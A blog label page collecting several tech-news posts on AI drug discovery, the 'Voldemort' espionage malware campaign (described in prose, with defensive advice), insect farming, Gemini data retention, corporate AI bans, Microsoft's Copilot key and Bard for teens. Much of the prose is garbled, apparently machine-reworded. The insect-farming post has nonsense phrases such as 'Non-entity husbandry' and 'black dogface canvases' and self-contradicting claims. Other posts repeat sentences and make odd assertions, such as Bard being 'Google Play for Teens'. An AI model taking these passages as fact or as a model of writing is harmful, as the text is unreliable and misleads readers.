Search This Blog

Powered by Blogger.

Blog Archive

Labels

About Me

Showing posts with label Artificial Inteligence. Show all posts

AI-Designed Drugs by DeepMind Expected to Enter Clinical Trials This Year

 

Isomorphic Labs, a Google DeepMind spinoff, is set to see its AI-designed drugs enter clinical trials this year, according to Nobel Prize-winning CEO Demis Hassabis.

“We’ll hopefully have some AI-designed drugs in clinical trials by the end of the year,” Hassabis shared during a panel at the World Economic Forum in Davos. “That’s the plan.”

The company aims to drastically reduce the drug discovery timeline from years to mere weeks or months, leveraging breakthroughs in artificial intelligence. Hassabis, along with DeepMind scientist John Jumper and a US professor, was awarded the 2024 Nobel Prize in Chemistry for their innovative work in predicting protein structures.

While AI's ability to analyze vast data sets holds promise for speeding up drug development, a December report by Bloomberg Intelligence highlighted a cautious adoption of the technology by major pharmaceutical companies. The report, led by analyst Andrew Galler, noted that initial data for clinical candidates has been mixed.

Despite this, partnerships between tech firms and pharmaceutical companies are growing. In 2023, Isomorphic Labs entered into strategic research collaborations with Eli Lilly & Co. and Novartis AG.

Founded in 2021 to commercialize DeepMind’s AI in drug discovery, Isomorphic Labs builds on the success of AlphaFold, DeepMind’s revolutionary tool for predicting protein patterns. Since its launch in 2018, AlphaFold has evolved to its third iteration, now capable of modeling a wide range of molecular structures, including DNA and RNA, and predicting their interactions.

Espionage Concerns Arise from Newly Discovered Voldemort Malware

 


As a result of Proofpoint researchers' research, in August 2024, they discovered an unusual campaign in which custom malware was being delivered by a novel attack chain. Cybercriminals are believed to have named the malware "Voldemort" based on the internal file names and strings used in it.  As part of the attack chain, multiple tactics have been employed, some of which are currently popular in the threat landscape, while others are less common, such as using Google Sheets as a program for command and control (C2). 

It is noteworthy that in addition to tactical, technical, and procedural (TTPs) components, it takes advantage of a lure theme impersonating the government agencies of a variety of countries, and it uses odd file naming and passwords such as "test". Several researchers initially suspected that the activity may be a red team, but analysis of the malware and the number of messages indicated that it was a threat actor very quickly.   

There has been an aggressive malware campaign known as "Voldemort" launched against organizations all over the world, impersonating tax authorities in Europe, Asia, and the U.S. Since the malicious activity was launched on Aug. 5, more than 20,000 phishing messages were reported worldwide by dozens of companies. According to Proofpoint, over 20,000 phishing messages were reported during the last three months. 

A custom backdoor has been written in C and was designed to enable data exfiltration and the deployment of additional malicious payloads, as well as the exfiltration of data itself. The exploit is based on an exploit that takes advantage of a browser extension called 'Google Sheets' to be used as the C2 communication tool for the attack, and files that are infected with a malicious Windows search protocol are used to carry out the attack. 

As soon as the victim downloads the malware, it uses WebEx software to load a DLL that communicates with the C2 server using a legitimate version of WebEx software. There are several attack chains outlined in this attack chain, which include a variety of techniques currently common in the threat landscape, as well as a variety of rarely used methods of command and control (C2) such as the use of Google Sheets. 

Various tactics, techniques, and procedures (TTP) have been applied to it in combination with lure themes impersonating government agencies of various countries as well as its strange file naming and passwords, such as "test". Initial suspicions were that this activity might have been the work of a red team, but the large volume of messages and an analysis of the malware indicated that it was the work of a threat actor very quickly.   

In Proofpoint's assessment, there is a moderate amount of confidence that this is likely the actions of an advanced persistent threat (APT) actor that is seeking to gather intelligence. Although Proofpoint is well-versed in identifying named threat actors, it is still not confident enough with the data available to attribute a specific TA with high certainty. There is no doubt that some aspects of the malware, such as the widespread targeting and characteristics, are associated more often with cybercrime activity, but the nature of the malware does not appear to be motivated by financial gain at this time, but more by espionage.  

Powered by C, Voldemort is a custom backdoor that was written to gather information. As well as the capability to gather information, it also can drop additional payloads on the target. As Proofpoint discovered, Cobalt Strike was being hosted on the actor's infrastructure, and that would likely be one of the payloads that is being delivered by the actor.   There was a significant increase in phishing emails sent daily by the hackers beginning on August 17, when nearly 6,000 emails appeared to be impersonating tax agencies, which was high, according to the researchers. 

In addition to the Internal Revenue Service (IRS) in the United States, the HM Revenue & Customs in the United Kingdom, and the Direction Générale des Finances Publiques in France joined the list of potential regulators. A layer of credibility was added to the lures by crafting the phishing email in the native language of the respective tax authority, adding a high degree of legitimacy to the message. As part of their authenticity, the emails received from what appeared to be compromised domains contained the legitimate domain names of the tax agencies, to make them appear more genuine. 

There is no definitive answer to the overall objective of the campaign, though Proofpoint researchers say it seems likely that the campaign is aimed at espionage, given Voldemort's intelligence-gathering capacities as well as his ability to deploy additional payloads into the mainstream. There are more than half of all targeted organizations fall into the sectors of insurance, aerospace, transportation, and education. 

The threat actor behind this campaign is unknown, but Proofpoint believes that it may be engaged in cyber espionage operations as a means of obtaining information. Likewise, the messages also contain Google AMP Cache URLs that redirect to the landing page on InfinityFree, as well as a direct link to the landing page, which is included in the campaign later on. Towards the bottom of the landing page, there is a button that says "Click to view the document", which when clicked, checks the User Agent or software in the browser. 

When the User Agent contains "Windows," the browser is automatically redirected to a search-ms URI, which points to a TryCloudflare-tunneled URI ending in .search-ms. This redirection prompts the victim to open Windows Explorer, although the specific query responsible for this action remains hidden from the victim, leaving only a popup visible. Concurrently, an image is loaded from a URL ending in /stage1 on an IP address that is managed by the logging service pingb.in. This service enables the threat actor to record a successful redirect and collect additional browser and network information about the victim. 

A distinguishing feature of the Voldemort malware is its use of Google Sheets as a command and control (C2) server. The malware pings Google Sheets to retrieve new commands to execute on the compromised device and to serve as a repository for exfiltrated data. Each infected machine writes its data to specific cells within the Google Sheet, which are often designated by unique identifiers, such as UUIDs. This method ensures that data from different breached systems remains isolated, allowing for more efficient management. 

Voldemort interacts with Google Sheets using Google's API, relying on an embedded client ID, secret, and refresh token, all of which are stored in its encrypted configuration. This strategy offers malware a dependable and widely available C2 channel while minimizing the chances of its network communications being detected by security tools. Given that Google Sheets is commonly used in enterprise environments, blocking this service could be impractical, further reducing the likelihood of detection. 

In 2023, the Chinese advanced persistent threat (APT) group APT41 was observed using Google Sheets as a C2 server, employing the red-teaming GC2 toolkit to facilitate this activity. To defend against such campaigns, security firm Proofpoint recommends several measures: restricting access to external file-sharing services to trusted servers only, blocking connections to TryCloudflare when not actively required, and closely monitoring for suspicious PowerShell executions. These steps are advised to mitigate the risks posed by the Voldemort malware and similar threats.

Insect Farmers Embrace AI to Drive Down Production Costs

 


The insect farming industry, previously thought of as an industry that was in desperate need of development, has rapidly gained popularity as a practical and sustainable solution to the severe worldwide challenges of food safety, environmental degradation, and aid shortages that are affecting the world today. Insect farming techniques that are both green and charge-powerful are becoming increasingly important as the demand for alternative protein resources increases. 

To respond, forward-thinking insect farmers are turning to artificial intelligence (AI) to optimize their operations and reduce expenses. Non-entity husbandry is a form of animal husbandry that involves the raising and keeping of insects, such as mealworms, justices, and black dogface canvases, to be used for human consumption or to prevent disease, create diseases, or perform unique tasks. 

Insect farming has several advantages over conventional farm animal farming, including a higher feed conversion rate, a reduction in greenhouse gas emissions, and a reduction in the amount of land and water required. As opposed to soybean-based animal feed, insect farming can help reduce greenhouse gas emissions. If larvae are fed natural food waste, insect-based feed has a lower carbon footprint. 

Full Circle Biotechnology optimises production and reduces costs using artificial intelligence. There is a company called Full Circle, which is located outside Bangkok, and that produces 20 million black soldier fly larvae to provide sustainable food for shrimp farms and pig farms. Fruit and vegetable wastes are provided by food and beverage manufacturers to the larvae, which are then combined with probiotic bacteria and mushrooms to create a sustainable food source for Thailand's shrimp and pig farms. 

The company is located in a small, enclosed facility just outside of Bangkok that produces animal feed for shrimp farms and pig farms in the country. To survive in this dark, warm, humid environment, the larvae feed on the wastes of fruit and vegetables sourced from food manufacturers before they are harvested in combination with probiotic bacteria and mushrooms, which can produce a probiotic effect. 

Using insect-based feeds is Collins' belief that they will be able to reduce deforestation in South America, which is associated with soybean-based feeds. Moreover, studies have shown that insect-based feeds have a much lower carbon footprint than soymeal, and Full Circle's feed is "100 times lower than that of soymeal." Additionally, Full Circle's feed has a much lower carbon footprint than soymeal. 

As an insect food, people are not only ensuring the environment is protected but also ensuring that they get the best nutrition. There is generally no doubt that insect-based feed does reduce the carbon footprint of the environment if the larvae are fed natural food waste, which is the only way to make sure that the larvae are fed organic matter. According to one report, soybean-based feed produces less carbon than soybean feed if the insects have been fed processed food sources. 

A Full Circle feed contains a substantial amount of protein, which is more than twice as much protein as a soy feed. Because of this, animal feed is more filling and nutritious than soy. Full Circle is a rural market supplier based in Thailand that supplies 49 farms across the country, employing 14 people at the moment. 

Despite this, the company faces a challenge - soybeans-based feed is significantly cheaper than insect-based feeds, so it is a challenge to provide both. It is for this reason that Full Circle is turning to artificial intelligence (AI) to optimize its production and decrease its costs to overcome this barrier. Full Circle is now turning to artificial intelligence in an attempt to recoup some of the price it pays for its feed by maximising production while reducing its cost. 

A machine learning algorithm is being developed to be able to examine and analyze all available past and current data on the evolution of insect farming to figure out and then continuously fine-tune the most efficient methods. There can be a wide range of variables to consider in this regard, ranging from the temperature to the amount of food used, the optimum space the larvae need, tracking thousands of flies quickly and accurately, and whether or not to introduce new strains of flies. 

To improve the quality of their products, Full Circle seeks to fine-tune their methods by training an AI system that analyses historical and current data on insect farming. Optimising temperatures, food supplies, the necessary space for larvae, or even introducing new strains or species of bacteria are all examples of how to accomplish this. 

AI is believed to be an invaluable tool for speeding up trial and error so that a better understanding of the production and harvesting processes of insects can be achieved. At the same time, in Lithuania, a software provider for insect farm management Cogastro is also working on a system based on artificial intelligence. 

Indeed, they are currently providing data analysis software to analyze data, but the AI upgrade will allow the system to adjust, adapt, and make changes autonomously within an insect farm if it learns from the data. Cogastro is poised to launch its AI commercially within the next three years, a move spearheaded by its founder and CEO, Mante Sidlauskaite. 

However, Sidlauskaite advises caution against the proliferation of companies claiming immediate access to AI systems, stressing the significance of time and experience in refining accurate AI models. The integration of AI into insect farming heralds a significant shift in the agricultural landscape, as emphasized by Sidlauskaite. By leveraging the capabilities of AI, insect farmers stand to benefit from reduced costs, enhanced efficiency, and expedited progress towards a more sustainable and resilient food production system. 

With the demand for alternative protein sources on the rise, AI-driven insect farming is positioned to play a pivotal role in shaping the future of agriculture. At Full Circle, collaboration with Singapore-based AI specialist Simon Christofides is underway to develop their AI system. Full Circle's spokesperson, Collins, acknowledges the relative novelty of black soldier fly larvae farming compared to traditional agricultural practices, indicating that there is much to learn. 

He expresses confidence in AI's ability to accelerate the learning curve by analyzing extensive data collected from various sensors. While AI optimization is deemed essential for production enhancement, Collins underscores the necessity of maintaining a hands-off approach in certain aspects of insect farming.

Where is AI Leading Content Creation?


Artificial Intelligence (AI) is reshaping the world of social media content creation, offering creators new possibilities and challenges. The fusion of art and technology is empowering creators by automating routine tasks, allowing them to channel their energy into more imaginative pursuits. AI-driven tools like Midjourney, ElevenLabs, Opus Clip, and Papercup are democratising content production, making it accessible and cost-effective for creators from diverse backgrounds.  

Automation is at the forefront of this revolution, freeing up time and resources for creators. These AI-powered tools streamline processes such as research, data analysis, and content production, enabling creators to produce high-quality content more efficiently. This democratisation of content creation fosters diversity and inclusivity, amplifying voices from various communities. 

Yet, as AI takes centre stage, questions arise about authenticity and originality. While AI-generated content can be visually striking, concerns linger about its soul and emotional depth compared to human-created content. Creators find themselves navigating this terrain, striving to maintain authenticity while leveraging AI-driven tools to enhance their craft. 

AI analytics are playing a pivotal role in content optimization. Platforms like YouTube utilise AI algorithms for A/B testing headlines, predicting virality, and real-time audience sentiment analysis. Creators, armed with these insights, refine their content strategies to tailor messages, ultimately maximising audience engagement. However, ethical considerations like algorithmic bias and data privacy need careful attention to ensure the responsible use of AI analytics in content creation. 

The rise of virtual influencers, like Lil Miquela and Shudu Gram, poses a unique challenge to traditional content creators. While these virtual entities amass millions of followers, they also threaten the livelihoods of human creators, particularly in influencer marketing campaigns. Human creators, by establishing genuine connections with their audience and upholding ethical standards, can distinguish themselves from virtual counterparts, maintaining trust and credibility. 

As AI continues its integration into content creation, ethical and societal concerns emerge. Issues such as algorithmic bias, data privacy, and intellectual property rights demand careful consideration for the responsible deployment of AI technologies. Upholding integrity and ethical standards in creative practices, alongside collaboration between creators, technologists, and policymakers, is crucial to navigating these challenges and fostering a sustainable content creation ecosystem. 

In this era of technological evolution, the impact of AI on social media content creation is undeniable. As we embrace the possibilities it offers, addressing ethical concerns and navigating through the intricacies of this digitisation is of utmost importance for creators and audiences alike.

 

Persistent Data Retention: Google and Gemini Concerns

 


While it competes with Microsoft for subscriptions, Google has renamed its Bard chatbot Gemini after the new artificial intelligence that powers it, called Gemini, and said consumers can pay to upgrade its reasoning capabilities to gain subscribers. Gemini Advanced offers a more powerful Ultra 1.0 AI model that customers can subscribe to for US$19.99 ($30.81) a month, according to Alphabet, which said it is offering Gemini Advanced for US$19.99 ($30.81) a month. 

The subscription fee for Gemini storage is $9.90 ($15.40) a month, but users will receive two terabytes of cloud storage by signing up today. They will also have access to Gemini through Gmail and the Google productivity suite shortly. 

It is believed that Google One AI Premium, as well as its partner OpenAI, are the biggest competitors yet for the company. It also shows that consumers are becoming increasingly competitive as they now have several paid AI subscriptions to choose from. 

In the past year, OpenAI's ChatGPT Plus subscription launched an early access program that allowed users to purchase early access to AI models and other features, while Microsoft recently launched a competing subscription for artificial intelligence in Word and Excel applications. The subscription for both services costs US$20 a month in the United States.

According to Google, human annotators are routinely monitoring and modifying conversations that are read, tagged, and processed by Gemini - even though these conversations are not owned by Google Accounts. As far as data security is concerned, Google has not stated whether these annotators are in-house or outsourced. (Google does not specify whether they are in-house or outsourced.)

These conversations will be kept for as long as three years, along with "related data" such as the languages and devices used by the user and their location, etc. It is now possible for users to control how they wish to retain the Gemini-relevant data they use. 

Using the Gemini Apps Activity dashboard in Google’s My Activity dashboard (which is enabled by default), users can prevent future conversations with Gemini from being saved to a Google Account for review, meaning they will no longer be able to use the three-year window for future discussions with Gemini). 

The Gemini Apps Activity screen lets users delete individual prompts and conversations with Gemini, however. However, Google says that even when Gemini Apps Activity is turned off, Gemini conversations will be kept on the user's Google Account for up to 72 hours to maintain the safety and security of Gemini apps and to help improve Gemini apps. 

In user conversations, Google encourages users not to enter confidential or sensitive information which they might not wish to be viewed by reviewers or used by Google to improve their products, services, and machine learning technologies. At the beginning of Thursday, Krawczyk said that Gemini Advanced was available in English in 150 countries worldwide. 

Next week, Gemini will begin launching smartphones in Asia-Pacific, Latin America and other regions around the world, including Japanese and Korean, as well as additional language support for the product. This will follow the company's smartphone rollout in the US.

The free trial subscription period lasts for two months and it is available to all users. Upon hearing this announcement, Krawczyk said the Google artificial intelligence approach had matured, bringing "the artist formerly known as Bard" into the "Gemini era." As GenAI tools proliferate, organizations are becoming increasingly wary of privacy risks associated with such tools. 

As a result of a Cisco survey conducted last year, 63% of companies have created restrictions on what kinds of data might be submitted to GenAI tools, while 27% have prohibited GenAI tools from being used at all. A recent survey conducted by GenAI revealed that 45% of employees submitted "problematic" data into the tool, including personal information and non-public files about their employers, in an attempt to assist. 

Several companies, such as OpenAI, Microsoft, Amazon, Google and others, are offering GenAI solutions that are intended for enterprises that no longer retain data for any primary purpose, whether for training models or any other purpose at all. There is no doubt that consumers are going to get shorted - as is usually the case - when it comes to corporate greed.

The Rise of AI Restrictions: 25% of Firms Slam the Door on AI Magic

 


When ChatGPT was first released to the public, several corporate titans, from Apple to Verizon, made headlines when they announced bans on the use of this software at work shortly after it was introduced. However, a recent study confirms that those companies are not anomalous. 

It has recently been reported that more than 1 in 4 companies have banned the use of generative artificial intelligence tools at work at some point in time, based on a Cisco survey conducted last summer among 2,600 privacy and security professionals. 

According to the survey, 63% of respondents said that they limit the amount of data employees can enter into these systems, and 61% said that they restrict which generative AI tools employees can use within their organizations. Approximately one-quarter of companies have banned their employees from using generative artificial intelligence, according to a new Cisco survey. 

Based on the annual Data Privacy Benchmark Study, conducted by the firm, a survey of 2,600 privacy and security professionals across 12 countries, two-thirds of those surveyed impose restrictions on the types of information that can be entered into LLM-based systems, as well as prohibiting specific applications from being used. 

According to Robert Waitman, director of Cisco's Privacy Center of Excellence, who wrote a blog post about the survey, over two-thirds of respondents expressed concern that their data would be disclosed to competitors or the public, a concern that may not be met by the majority. The information they entered about the company was not entirely public (48% of the respondents), which could pose a problem. 

There are a lot of concerns about the use of AI that involves their data today, and 91% of organizations are aware that they need to do more to make sure customers feel confident that their data is used for the intended and legitimate purposes in AI. There has been little progress in building consumer trust over the past year as this level is similar to last year's level, suggesting that not much progress has been made. 

Organizations' priorities differ from individuals' when it comes to building consumer trust. As a consumer, one of the most important things to be concerned about is getting clear information about exactly how their data is being used and not having it sold to marketers. A survey of businesses conducted by the American Association of Professionals revealed that compliance with privacy laws is the top priority (25%) along with avoiding data breaches (23%). 

Furthermore, it indicates that a greater focus on transparency would be beneficial — particularly in AI applications, where understanding how algorithms make decisions can be difficult. Over the past five years, there has been a more than double increase in privacy spending, a rise in benefits, and a steady return on investment. 

It was reported this year that 95% of respondents indicated that privacy benefits outweigh the costs, with an average organization reporting 1.6 times the return on investment they received from privacy. Additionally, 80% of respondents indicated they had benefited from their privacy investments in terms of higher levels of loyalty and trust, and that number was even higher (92%) among the most privacy-aware organizations. 

Since last year, the largest organizations with 10,000+ employees have increased their privacy spending by around 7-8% in terms of their spending on privacy. The number of investments was lower for smaller organizations, however. The average privacy investment for businesses with 50-249 employees was decreased by a fourth on average than that for businesses with 50-499 employees. 

“The survey results revealed that 94% of respondents would not buy from Cisco if they did not adequately protect their customers' data. According to Harvey Jang, Cisco Vice President and Chief Privacy Officer, “Customers are looking for hard evidence that an organization can be trusted.” 

Privacy has become inextricably linked with customer trust and loyalty. Investing in privacy can help organizations leverage AI ethically and responsibly in the era of AI, and this is especially true as AI becomes more prevalent.

Microsoft is Rolling out an AI Powered Key

 


Prepare for a paradigm shift as Microsoft takes a giant leap forward with a game-changing announcement – the integration of an Artificial Intelligence (AI) key in their keyboards, the most substantial update in 30 years. 

This futuristic addition promises an interactive and seamless user experience, bringing cutting-edge technology to the tips of your fingers. Explore the next frontier of computing as Microsoft redefines the way we engage with our keyboards, setting a new standard for innovation in the digital age. The groundbreaking addition grants users seamless access to Copilot, Microsoft's dynamic AI tool designed to elevate your computing experience. 

At the forefront of AI advancements, Microsoft, a key investor in OpenAI, strategically integrates Copilot's capabilities into various products. Witness the evolution of AI as Microsoft weaves its intelligence into the fabric of everyday tools like Microsoft 365 and enhances search experiences through Bing. 

Not to be outdone, rival Apple has long embraced AI integration, evident in Macbooks featuring a dedicated Siri button on their touch bar. As the tech giants vie for user-friendly AI interfaces, Microsoft's AI key emerges as a pivotal player in redefining how we interact with technology. 

Copilot, the star of Microsoft's AI arsenal, goes beyond the ordinary, assisting users in tasks ranging from efficient searches to crafting emails and even generating visually striking images. It's not just a tool; it's your personalised AI companion, simplifying tasks and enriching your digital journey. Welcome to the era where every keystroke opens doors to boundless possibilities. 

By pressing this key, users seamlessly engage with Copilot, enhancing their daily experiences with artificial intelligence. Similar to the impact of the Windows key introduced nearly 30 years ago, the Copilot key marks another significant milestone in our journey with Windows, serving as the gateway to the realm of AI on PCs. 

In the days leading up to and during CES, the Copilot key will debut on numerous Windows 11 PCs from our ecosystem partners. Expect its availability from later this month through Spring, including integration into upcoming Surface devices. 

This addition, which simplifies access to Copilot, has already made waves in Office 365 applications like Word, PowerPoint, and Teams, offering functionalities such as meeting summarization, email writing, and presentation creation. Bing, Microsoft's search engine, has also integrated Copilot. 

According to Prof John Tucker from Swansea University, the introduction of this key is a natural progression, showcasing Microsoft's commitment to enhancing user experience across various products. Despite Windows 11 users already having access to Copilot via the Windows key + C shortcut, the new dedicated key emphasises the feature's value.

Acknowledging the slow evolution of keyboards over the past 30 years, Prof Tucker notes that Microsoft's focus on this particular feature illustrates its potential to engage users across multiple products. Google, a dominant search engine, employs its own AI system called Bard, while Microsoft's Copilot is built on OpenAI's GPT-4 language model, introduced in 2022. 

The UK's competition watchdog is delving into Microsoft's ties with OpenAI, prompted by disruptions in the corporate landscape that resulted in a tight connection between the two entities. The investigation seeks to understand the implications of this close association on competition within the industry. 

As we anticipate its showcase at CES, this innovative addition not only reflects Microsoft's commitment to user-friendly technology but also sparks curiosity about the evolving landscape of AI integration. Keep your eyes on the keyboard – the Copilot key signals a transformative era where AI becomes an everyday companion in our digital journey.


Google Eases Restrictions: Teens Navigate Bard with Guardrails

 


It has been announced that Google is planning on allowing teens in most countries to use a chatbot called Bard which is based on artificial intelligence and possesses some guardrails. It has been announced that on Thursday, Google will begin opening up access to Bard (also known as Google Play for Teens) to teenagers in most countries around the world, according to Tulsee Doshi, Head of Product, Responsible AI at Google. 

A chatbot can be accessed by teens who meet the minimum age requirement to manage their own Google Account as well as those who meet the minimum age requirement to manage their own account in a variety of languages in the future. The expanded launch will come with a number of safety features and guardrails designed to prevent teens from accessing harmful content.

According to a blog post by Google, teenagers can use the search giant's new tool to find inspiration, learn new hobbies and find solutions to everyday problems, and teens can text Bard with questions about anything from important topics, such as where to apply to college, to more fun matters, such as learning an entirely new sport.

According to Google, the platform is also a valuable learning tool, as it enables teens to dig deeper and learn more about topics, while developing their understanding of complex concepts in the process. In addition to finding inspiration, teens can use Bard to discover new hobbies and solve problems they face every day. 

Additionally, Bard can be a useful learning tool for teens, giving them an opportunity to go deeper into topics, gain a better understanding of complex concepts, and practice new skills in ways that have proven successful for them. 

There are safety features in place at Bard so that users are protected against unsafe content being displayed in its responses to teens, such as illegal substances or those that are age-gated. This training is intended to help Bard recognize matters that are inappropriate to teens.

As soon as teenagers start to ask fact-based questions on Google for the first time, Google will run a feature called double-checking a response, which is intended to ensure that substantiation of Bard’s answer can be found across the web. 

To help students develop information literacy and critical thinking skills, Bard will actively and continuously encourage them to use double-check. There are plans by Google to make everyone aware of how large language models (LLMs) can hallucinate, and they plan to make this feature available to everyone who uses Bard. 

A "tailored onboarding experience" will also be offered to teens which provides them with a link to Google's AI Literacy Guide, along with a video explaining how to use generative AI responsibly, and a description of how Bard Activity is used with the option to turn it on or off. In addition, Google has also announced that it will be bringing a math learning experience to Bard's campus, which will allow anyone, including teens, to type or upload a picture of a math equation. 

Instead of just providing the answer, this will allow Bard to explain exactly how it's solved step by step. In order to protect users, Google has put in place some guardrails that will make it easier for them to access the chatbot. 

Aside from being trained to recognize topics that are inappropriate for teens, Bard also comes equipped with guardrails to ensure that unsafe content is not displayed in its responses to teens, such as illegal substance use or age-gated drugs. 

In addition to some of the new features that are going to be added to Bard, the company is also adding some features that are likely to be very helpful to teens, but that everyone else can use too. It is possible to use Bard to explain how to solve a math problem when you type in it or upload a picture of it. 

In recent years, Google has been improving the quality of Search for homework. In addition, Bard will be able to create charts based on information provided in a prompt. It is not surprising that Google is releasing Bard for teens at the same time that social platforms have launched AI chatbots to young users to mixed reviews. 

A Snapchat chatbot launched in February without appropriate age-gating features and faced controversy after it was discovered that it was chatting to minors about issues such as covering up the smell of weed and setting the mood for sexual activity. Snapchat faced controversy for launching its "My AI" chatbot without appropriate age-gating features. 

It is now available in over 230 countries and territories, including the United States, the United Kingdom, and Australia. After the tool's limited early access launch in the US and the UK in February (where the company made an embarrassing factual error due to hallucinations), the company announced Bard in February. As Google tries to compete with chatbots like Microsoft's recently rebranded Bing Chat, now titled Copilot, and OpenAI's ChatGPT, it has also added a bunch of new features to Bard.